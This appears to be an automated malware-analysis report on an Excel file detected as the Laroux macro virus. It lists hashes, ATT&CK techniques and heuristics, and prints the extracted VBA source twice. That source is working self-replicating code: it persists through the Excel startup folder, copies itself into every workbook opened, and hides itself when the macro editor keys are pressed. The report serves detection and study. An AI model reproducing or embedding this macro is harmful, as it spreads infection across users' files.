Office (OLE) malware analysis — malicious · ca3ee37fa655f04e

MALICIOUS

Office (OLE)

155.0 KB Created: 2012-03-27 06:11:16 Authoring application: Microsoft Excel First seen: 2019-11-20

MD5: 50d29a4e450157ba61964cc416fe62ad SHA-1: e3626af18a3e1109f4cab582a05d74490eea250c SHA-256: ca3ee37fa655f04efd620062928c387d0a043591cf12b4dc55f06c6a7ac89900

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file contains a VBA macro with an Auto_Open subroutine, indicating it is designed to execute automatically upon opening. The macro attempts to establish persistence by copying itself to the Excel startup folder as 'StartUp.xls'. It also manipulates application events and keyboard shortcuts to potentially evade analysis or detection. The presence of the Auto_Open macro and the persistence mechanism strongly suggest malicious intent, though the specific payload or ultimate goal is not evident from the provided script.

Heuristics 3

ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1606 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1606 bytes
SHA-256: `79b21a7c777209cbed010937c211fa50ce8f1a7a563e8469017a43761e814fcd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "StartUp" Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = ActiveWorkbook.Name ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = ActiveSheet.Name Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub Sub escape() On Error Resume Next Application.OnSheetActivate = "StartUp.xls!back" Application.OnKey "%{F11}" Application.OnKey "%{F8}" Application.SendKeys "%{F11}" Application.SendKeys "%{F8}" For Each book In Workbooks Application.DisplayAlerts = False If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete Next For Each book In Workbooks If book.Name = "StartUp.xls" Then book.Close End If Next End Sub Sub back() On Error Resume Next Application.OnKey "%{F8}", "StartUp.xls!escape" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnSheetActivate = "StartUp.xls!cop" Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop" Workbooks.Open Application.StartupPath & "\StartUp.xls" End Sub

SHA-256: 79b21a7c777209cbed010937c211fa50ce8f1a7a563e8469017a43761e814fcd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "StartUp"
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If book.Name = "StartUp.xls" Then
book.Close
End If
Next
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.